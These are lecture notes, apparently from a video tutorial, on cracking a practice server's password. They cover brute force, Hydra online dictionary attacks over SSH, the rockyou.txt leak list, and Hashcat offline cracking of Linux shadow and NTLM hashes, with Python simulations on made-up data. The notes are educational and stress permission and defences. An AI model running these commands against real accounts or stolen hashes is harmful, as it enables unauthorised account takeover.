Password Hacking Lecture Notes

Jun 30, 2024

Password Hacking Tutorial

Introduction

  • Hacking into a server by cracking its password.
  • Educational purposes only: attack only the server provided for the exercise.

Goal

  • Hack into the server called "Coffee Server" for free coffee.
  • Username provided: dwight.schrute
  • Mission: Crack the password.

Brute Force Attack

  • Exhaustive guessing: try every possible password, one after another, until one works.
  • Example: 000000, 000001, 000002, and so on.
  • Guaranteed to succeed eventually, but the number of candidates grows exponentially with the password length and the size of the character set, so a long password can take years.
  • Trying candidates one after another like this is what "brute force" technically means; the dictionary attack below is the same idea with a much better ordering of the guesses.
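As an added example (not from the lecture), the sequential guessing described above in Python, together with a keyspace-size calculation that shows why it "can take years". The target hash, the six-digit PIN behind it and the guessing rate of 10 billion per second are constructed assumptions for the demonstration.

```python
import hashlib
import itertools
import string

SECONDS_PER_YEAR = 365 * 24 * 3600

# Constructed target: the SHA-256 of a six-digit PIN, standing in for a leaked
# hash whose plaintext the attacker does not know. (Example value only.)
TARGET_HASH = hashlib.sha256(b"004217").hexdigest()


def keyspace_size(charset_len: int, length: int) -> int:
    """Number of candidate passwords of exactly `length` characters."""
    return charset_len ** length


def years_to_exhaust(charset_len: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a given guessing rate."""
    return keyspace_size(charset_len, length) / guesses_per_second / SECONDS_PER_YEAR


def brute_force(target_hash: str, charset: str, length: int, hash_name: str = "sha256"):
    """Try every candidate of `length` characters in lexicographic order
    (000000, 000001, 000002, ...) and return (password, guesses made),
    or (None, keyspace size) if nothing matched."""
    candidates = itertools.product(charset, repeat=length)
    for guesses, chars in enumerate(candidates, start=1):
        candidate = "".join(chars)
        if hashlib.new(hash_name, candidate.encode()).hexdigest() == target_hash:
            return candidate, guesses
    return None, keyspace_size(len(charset), length)


if __name__ == "__main__":
    pw, guesses = brute_force(TARGET_HASH, string.digits, 6)
    print(f"cracked {pw!r} after {guesses:,} guesses")

    # Why "can take years": a 10-character password over the 94 printable
    # ASCII characters, at an assumed 10 billion guesses per second.
    printable = string.ascii_letters + string.digits + string.punctuation
    print(f"{len(printable)}^10 = {keyspace_size(len(printable), 10):,} candidates, "
          f"about {years_to_exhaust(len(printable), 10, 1e10):,.0f} years to exhaust")
```

A six-digit PIN falls in a few thousand guesses; the same loop over ten printable characters has about 5.4e19 candidates, roughly 170 years at the assumed rate, which is the whole argument for the dictionary attack that follows.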

Dictionary Attack

  • Try passwords from a list of known or common passwords instead of every possible string.
  • More effective because real users pick predictable passwords, so the likely ones are tried first.
  • Hydra is the tool for online dictionary attacks (guessing against a live login service).
    • Available on Kali Linux as hydra.
    • Command format: hydra -l [username] -P [password_file] [host] [service_type], or equivalently [service_type]://[host] (lowercase -l is one username and uppercase -P a password list; uppercase -L takes a list of usernames and lowercase -p a single password).
    • Example: hydra -l dwight.schrute -P wordlist.txt ssh://45.xxx.xxx

RockYou Password List

  • Real passwords leaked in the 2009 breach of RockYou, a social-media application developer that had stored its users' passwords in plaintext.
  • rockyou.txt contains about 14 million unique passwords (from roughly 32 million accounts).
  • Location in Kali Linux: /usr/share/wordlists/rockyou.txt, shipped compressed as rockyou.txt.gz; decompress it once with gunzip before use.

Online vs Offline Attacks

Online

  • Each guess is a real login attempt against a live service, so the attack is slow (network round-trips, service timeouts), can be blocked by firewalls and rate limits, can lock the account after a few failures, and leaves every attempt in the server's logs.
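Hydra's online dictionary attack, as an added example that is not from the lecture: the Python below runs the same loop Hydra does (one login attempt per word, in list order, stopping at the first success) against a constructed in-memory stand-in for the remote login service, and shows what an account-lockout policy does to it. The service, user, password and word list are made up for the example.

```python
from dataclasses import dataclass, field


@dataclass
class MockLoginService:
    """Constructed stand-in for the remote service Hydra would talk to
    (e.g. SSH on the coffee server). It knows the real passwords and
    enforces a lockout; the attacker only sees True/False per attempt."""
    users: dict                      # username -> correct password (constructed)
    max_failures: int = 5            # consecutive failures before the account locks
    failures: dict = field(default_factory=dict)
    locked: set = field(default_factory=set)
    attempts_logged: int = 0         # every attempt lands in the server log

    def login(self, username: str, password: str) -> bool:
        self.attempts_logged += 1
        if username in self.locked:
            return False             # locked: even the right password is refused
        if self.users.get(username) == password:
            self.failures[username] = 0
            return True
        self.failures[username] = self.failures.get(username, 0) + 1
        if self.failures[username] >= self.max_failures:
            self.locked.add(username)
        return False


def online_dictionary_attack(service: MockLoginService, username: str, wordlist: list):
    """What `hydra -l <user> -P <wordlist> ssh://<host>` does: one real login
    attempt per word, in list order, stopping at the first success.
    Returns (password or None, number of attempts sent)."""
    for attempts, word in enumerate(wordlist, start=1):
        if service.login(username, word):
            return word, attempts
    return None, len(wordlist)


# Constructed word list; the real password sits at position 7.
WORDLIST = ["123456", "password", "qwerty", "beets", "bears", "schrute", "battlestar"]
USER = "dwight.schrute"


def run_without_lockout():
    svc = MockLoginService(users={USER: "battlestar"}, max_failures=10**9)
    return online_dictionary_attack(svc, USER, WORDLIST)


def run_with_lockout():
    svc = MockLoginService(users={USER: "battlestar"}, max_failures=5)
    result = online_dictionary_attack(svc, USER, WORDLIST)
    # After the lockout, even the correct password no longer works,
    # and every attempt (including this one) is in the server log.
    return result, USER in svc.locked, svc.login(USER, "battlestar"), svc.attempts_logged


if __name__ == "__main__":
    print("no lockout:", run_without_lockout())
    print("lockout after 5 failures:", run_with_lockout())
```

With no lockout the seventh guess succeeds; with a five-failure lockout the same word list never succeeds, the account is locked for the legitimate user too, and the defender has eight logged attempts pointing at the attack. That asymmetry is why the offline attack in the next section is preferred whenever the hashes can be obtained.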

Offline

  • Work from stolen password hashes instead of a live login (for example the hashes in /etc/shadow on Linux or the SAM database on Windows).
  • Hashing: a one-way function (MD5, SHA-256, ...) that turns a password of any length into a fixed-length string; the same input always gives the same hash, but the hash cannot be reversed into the password.
  • Servers store the hash rather than the password, so an attacker who reads the database cannot simply read the passwords; instead they must guess candidates, hash each one and compare, with no lockouts, timeouts or server logs to slow them down.

Hashcat Tool for Offline Cracking

  • Works by hashing every candidate from the word list with the same algorithm and comparing the result against the target hashes; a match reveals the password.
  • Inputs: a file of hashes and a word list (e.g. rockyou.txt). -a 0 selects the straight dictionary attack mode, -m selects the hash type, -o writes cracked results to a file.
  • Example commands:
    • hashcat -a 0 -m 1800 -o crackpasswords.txt hashes.txt wordlist.txt (mode 1800 = sha512crypt, the $6$ hashes found in a Linux /etc/shadow file)
    • For Windows passwords: hashcat -a 0 -m 1000 -o crackpasswords.txt [hash] wordlist.txt (mode 1000 = NTLM; [hash] is a single hash or a file of hashes)
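An added example (not the lecture's code) of what hashcat -a 0 does under the hood: hash each word from the list and compare it with the targets. It uses plain SHA-256, which the lecture names, on a constructed hashes.txt rather than the sha512crypt or NTLM formats of the two commands above, and it includes one salted entry to show why salting forces separate work per target hash. All users, salts, hashes and the word list are constructed for the example.

```python
import hashlib


def _sha256(s: str) -> str:
    return hashlib.sha256(s.encode()).hexdigest()


# Constructed hashes.txt in "user:hash" form. Two entries are plain SHA-256
# digests; the third is "salt$digest" where digest = SHA-256(salt + password).
# Real shadow/NTLM hashes use other formats (hashcat -m 1800 / -m 1000).
HASHES_TXT = "\n".join([
    "dwight.schrute:" + _sha256("battlestar"),
    "jim.halpert:" + _sha256("tuna"),
    "pam.beesly:a1b2$" + _sha256("a1b2" + "beets"),
    "",
])

# Constructed stand-in for rockyou.txt.
WORDLIST = ["123456", "password", "beets", "tuna", "battlestar"]


def parse_hash_file(text: str):
    """Return [(user, salt or None, digest)] from user:hash or user:salt$hash lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, hashfield = line.split(":", 1)
        salt, _, digest = hashfield.rpartition("$")   # no "$" -> salt is ""
        entries.append((user, salt or None, digest.lower()))
    return entries


def crack_hashes(hash_text: str, wordlist, hash_name: str = "sha256"):
    """The loop behind `hashcat -a 0`: hash each candidate word and compare it
    with the targets. Unsalted targets share one hash computation per word
    (a dictionary lookup covers all of them at once); each salted target
    needs its own computation per word. Returns ({user: password}, hashes computed)."""
    entries = parse_hash_file(hash_text)
    unsalted = {}                       # digest -> [users]
    salted = []                         # (user, salt, digest)
    for user, salt, digest in entries:
        if salt is None:
            unsalted.setdefault(digest, []).append(user)
        else:
            salted.append((user, salt, digest))

    cracked = {}
    computed = 0
    for word in wordlist:
        computed += 1
        digest = hashlib.new(hash_name, word.encode()).hexdigest()
        for user in unsalted.get(digest, []):
            cracked[user] = word
        for user, salt, target in salted:
            if user in cracked:
                continue
            computed += 1
            if hashlib.new(hash_name, (salt + word).encode()).hexdigest() == target:
                cracked[user] = word
        if len(cracked) == len(entries):
            break                       # nothing left to crack
    return cracked, computed


if __name__ == "__main__":
    cracked, computed = crack_hashes(HASHES_TXT, WORDLIST)
    print(f"{len(cracked)} of 3 hashes cracked with {computed} hash computations")
    for user, password in cracked.items():
        print(f"{user}:{password}")
```

The count of hash computations is the point: every unsalted hash in the file is checked for the price of one computation per word, which is why a leaked unsalted database falls all at once, whereas each salted hash costs its own pass over the word list. Hashcat's sha512crypt mode (-m 1800) adds a salt and thousands of iterations per guess on top of this, which is what slows a GPU down from billions to thousands of guesses per second.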

Practical Exercise

  • Viewers are challenged to break into the provided server themselves.
  • Two methods to use: Hydra for the online attack, Hashcat for the offline attack.

Closing Notes

  • Legal ramifications: Only hack with explicit permission.
  • Hashcat runs on GPUs as well as CPUs, so an offline attack can test many billions of candidates per second against fast hashes like MD5 and work through massive word lists; the defense is a slow, salted password hash and a long password that is not in any list.
  • Encourage responsible and legal use of the knowledge acquired.

Call to Action

  • Like and subscribe if enjoyed.